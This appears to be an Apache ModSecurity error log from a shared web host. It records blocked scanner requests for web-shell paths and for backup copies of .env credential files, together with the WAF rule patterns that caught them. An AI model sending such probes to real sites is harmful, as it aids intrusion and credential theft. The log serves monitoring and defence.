[Tue May 26 13:51:22.517035 2026] [security2:error] [pid 560287:tid 560472] [client 20.196.127.68:17505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ioxi-o.php"] [unique_id "ahVYApmX5s6sDS3wJVcXrAAAALg"]
[Tue May 26 13:51:22.977758 2026] [security2:error] [pid 560287:tid 560540] [client 15.235.169.50:52237] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/about.php"] [unique_id "ahVYApmX5s6sDS3wJVcXswAAAPg"]
[Tue May 26 13:51:23.119089 2026] [security2:error] [pid 560287:tid 560474] [client 20.196.127.68:17478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/in.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXuQAAALo"]
[Tue May 26 13:51:23.155195 2026] [security2:error] [pid 560287:tid 560522] [client 185.92.25.105:56415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXuAAAAOg"]
[Tue May 26 13:51:23.461282 2026] [security2:error] [pid 560287:tid 560482] [client 15.235.169.50:52331] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/atomlib.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXvQAAAME"]
[Tue May 26 13:51:23.756837 2026] [security2:error] [pid 560287:tid 560459] [client 20.196.127.68:14925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/info.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXxAAAAKw"]
[Tue May 26 13:51:23.934867 2026] [security2:error] [pid 555743:tid 555937] [client 15.235.169.50:52413] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/tmpls.php"] [unique_id "ahVYA8jqAquC0YaxQjC3pwAAAUo"]
[Tue May 26 13:51:24.028704 2026] [security2:error] [pid 560287:tid 560457] [client 207.241.173.79:25512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.copy"] [unique_id "ahVYBJmX5s6sDS3wJVcXzgAAAKo"]
[Tue May 26 13:51:24.286715 2026] [security2:error] [pid 560287:tid 560442] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYA5mX5s6sDS3wJVcXzQAAAJw"]
[Tue May 26 13:51:24.381709 2026] [security2:error] [pid 555743:tid 555934] [client 20.196.127.68:14926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/inputs.php"] [unique_id "ahVYBMjqAquC0YaxQjC3sQAAAUc"]
[Tue May 26 13:51:24.417413 2026] [security2:error] [pid 555743:tid 555915] [client 15.235.169.50:52474] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/as.php"] [unique_id "ahVYBMjqAquC0YaxQjC3swAAATQ"]
[Tue May 26 13:51:24.524015 2026] [security2:error] [pid 555743:tid 555969] [client 20.151.111.128:3185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVYBMjqAquC0YaxQjC3tAAAAWo"]
[Tue May 26 13:51:24.576532 2026] [security2:error] [pid 555743:tid 555970] [client 185.92.25.136:36591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahVYBMjqAquC0YaxQjC3twAAAWs"]
[Tue May 26 13:51:24.880832 2026] [security2:error] [pid 560287:tid 560446] [client 15.235.169.50:52534] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/randkeyword.php"] [unique_id "ahVYBJmX5s6sDS3wJVcX1AAAAKA"]
[Tue May 26 13:51:24.927037 2026] [security2:error] [pid 560287:tid 560463] [client 185.192.71.241:26237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahVYBJmX5s6sDS3wJVcX1QAAALA"]
[Tue May 26 13:51:25.007220 2026] [security2:error] [pid 555743:tid 555953] [client 20.196.127.68:17487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/item.php"] [unique_id "ahVYBcjqAquC0YaxQjC3wQAAAVo"]
[Tue May 26 13:51:25.359579 2026] [security2:error] [pid 560287:tid 560438] [client 15.235.169.50:52619] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/install.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX3wAAAJk"]
[Tue May 26 13:51:25.384139 2026] [security2:error] [pid 560287:tid 560490] [client 185.192.71.244:63145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX2wAAAMk"]
[Tue May 26 13:51:25.430221 2026] [security2:error] [pid 560287:tid 560475] [client 207.241.173.79:20100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.backup"] [unique_id "ahVYBZmX5s6sDS3wJVcX5QAAALs"]
[Tue May 26 13:51:25.430245 2026] [security2:error] [pid 560287:tid 560436] [client 207.241.173.79:20038] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX4wAAAJc"]
[Tue May 26 13:51:25.430245 2026] [security2:error] [pid 560287:tid 560472] [client 207.241.173.79:20140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.orig"] [unique_id "ahVYBZmX5s6sDS3wJVcX5AAAALg"]
[Tue May 26 13:51:25.430609 2026] [security2:error] [pid 555743:tid 555946] [client 207.241.173.79:20008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.orig"] [unique_id "ahVYBcjqAquC0YaxQjC3yQAAAVM"]
[Tue May 26 13:51:25.430723 2026] [security2:error] [pid 560287:tid 560526] [client 207.241.173.79:20088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX5gAAAOw"]
[Tue May 26 13:51:25.431031 2026] [security2:error] [pid 560287:tid 560491] [client 207.241.173.79:20018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.copy"] [unique_id "ahVYBZmX5s6sDS3wJVcX6QAAAMo"]
[Tue May 26 13:51:25.431051 2026] [security2:error] [pid 555743:tid 555883] [client 207.241.173.79:20058] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local~"] [unique_id "ahVYBcjqAquC0YaxQjC3yAAAARQ"]
[Tue May 26 13:51:25.431536 2026] [security2:error] [pid 555743:tid 555952] [client 207.241.173.79:20048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.backup"] [unique_id "ahVYBcjqAquC0YaxQjC3ygAAAVk"]
[Tue May 26 13:51:25.431544 2026] [security2:error] [pid 560287:tid 560455] [client 207.241.173.79:20078] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.bak"] [unique_id "ahVYBZmX5s6sDS3wJVcX6gAAAKg"]
[Tue May 26 13:51:25.432601 2026] [security2:error] [pid 555743:tid 555981] [client 207.241.173.79:19996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.swp"] [unique_id "ahVYBcjqAquC0YaxQjC3zQAAAXY"]
[Tue May 26 13:51:25.432699 2026] [security2:error] [pid 560287:tid 560511] [client 207.241.173.79:20118] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production~"] [unique_id "ahVYBZmX5s6sDS3wJVcX7gAAAN0"]
[Tue May 26 13:51:25.432704 2026] [security2:error] [pid 560287:tid 560524] [client 207.241.173.79:19970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.backup"] [unique_id "ahVYBZmX5s6sDS3wJVcX6AAAAOo"]
[Tue May 26 13:51:25.433103 2026] [security2:error] [pid 560287:tid 560509] [client 207.241.173.79:20134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.production.swp"] [unique_id "ahVYBZmX5s6sDS3wJVcX7wAAANs"]
[Tue May 26 13:51:25.433111 2026] [security2:error] [pid 560287:tid 560541] [client 207.241.173.79:20062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.orig"] [unique_id "ahVYBZmX5s6sDS3wJVcX7QAAAPk"]
[Tue May 26 13:51:25.433839 2026] [security2:error] [pid 555743:tid 555966] [client 207.241.173.79:19952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.bak"] [unique_id "ahVYBcjqAquC0YaxQjC30QAAAWc"]
[Tue May 26 13:51:25.434060 2026] [security2:error] [pid 560287:tid 560476] [client 207.241.173.79:19994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env~"] [unique_id "ahVYBZmX5s6sDS3wJVcX8AAAALw"]
[Tue May 26 13:51:25.434726 2026] [security2:error] [pid 560287:tid 560450] [client 207.241.173.79:20064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.copy"] [unique_id "ahVYBZmX5s6sDS3wJVcX8wAAAKQ"]
[Tue May 26 13:51:25.435015 2026] [security2:error] [pid 555743:tid 555881] [client 207.241.173.79:20030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.bak"] [unique_id "ahVYBcjqAquC0YaxQjC3zwAAARI"]
[Tue May 26 13:51:25.435775 2026] [security2:error] [pid 560287:tid 560531] [client 207.241.173.79:19956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.old"] [unique_id "ahVYBZmX5s6sDS3wJVcX8gAAAPE"]
[Tue May 26 13:51:25.466366 2026] [security2:error] [pid 560287:tid 560523] [client 20.151.111.128:3155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/zvmjauiw.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX-wAAAOk"], referer: www.google.com
[Tue May 26 13:51:25.538149 2026] [security2:error] [pid 555743:tid 556000] [client 207.241.173.79:20116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bh-cp-1.host.in"] [uri "/.env.local.swp"] [unique_id "ahVYBcjqAquC0YaxQjC30wAAAYk"]
[Tue May 26 13:51:25.631034 2026] [security2:error] [pid 560287:tid 560545] [client 20.196.127.68:13297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/k.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX_gAAAP0"]
[Tue May 26 13:51:25.773271 2026] [security2:error] [pid 560287:tid 560469] [client 185.92.25.100:44907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahVYBZmX5s6sDS3wJVcYAAAAALU"]
[Tue May 26 13:51:25.837495 2026] [security2:error] [pid 560287:tid 560481] [client 15.235.169.50:52701] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/assets/radio.php"] [unique_id "ahVYBZmX5s6sDS3wJVcYAwAAAMA"]
[Tue May 26 13:51:25.867184 2026] [security2:error] [pid 560287:tid 560507] [client 74.7.175.141:49392] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.d2cargo.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVYBZmX5s6sDS3wJVcYBAAA2Tw"]
[Tue May 26 13:51:25.872895 2026] [security2:error] [pid 560287:tid 560474] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYBZmX5s6sDS3wJVcX-gAAALo"]
[Tue May 26 13:51:26.243256 2026] [security2:error] [pid 560287:tid 560519] [client 91.230.225.167:31585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYCAAAAOU"]
[Tue May 26 13:51:26.269410 2026] [security2:error] [pid 560287:tid 560435] [client 20.196.127.68:13261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/license.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYDAAAAJY"]
[Tue May 26 13:51:26.297051 2026] [security2:error] [pid 560287:tid 560442] [client 15.235.169.50:52783] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/file.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYDQAAAJw"]
[Tue May 26 13:51:26.712430 2026] [security2:error] [pid 555743:tid 555890] [client 185.92.25.106:61357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahVYBsjqAquC0YaxQjC33QAAARs"]
[Tue May 26 13:51:26.782463 2026] [security2:error] [pid 560287:tid 560492] [client 15.235.169.50:52853] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/content.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYGwAAAMs"]
[Tue May 26 13:51:26.930873 2026] [security2:error] [pid 560287:tid 560446] [client 20.196.127.68:13970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/load.php"] [unique_id "ahVYBpmX5s6sDS3wJVcYHgAAAKA"]
[Tue May 26 13:51:27.222436 2026] [security2:error] [pid 560287:tid 560447] [client 185.192.71.227:39565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIgAAAKE"]
[Tue May 26 13:51:27.274610 2026] [security2:error] [pid 560287:tid 560455] [client 15.235.169.50:52911] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/lock.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIwAAAKg"]
[Tue May 26 13:51:27.476171 2026] [security2:error] [pid 560287:tid 560504] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYIQAAANY"]
[Tue May 26 13:51:27.514074 2026] [security2:error] [pid 560287:tid 560509] [client 20.196.127.68:13990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/manager.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYLQAAANs"]
[Tue May 26 13:51:27.664721 2026] [security2:error] [pid 555743:tid 555949] [client 185.92.25.100:28797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/envato-css.php"] [unique_id "ahVYB8jqAquC0YaxQjC35gAAAVY"]
[Tue May 26 13:51:27.761762 2026] [security2:error] [pid 560287:tid 560551] [client 15.235.169.50:52975] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/v1.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYMwAAAQM"]
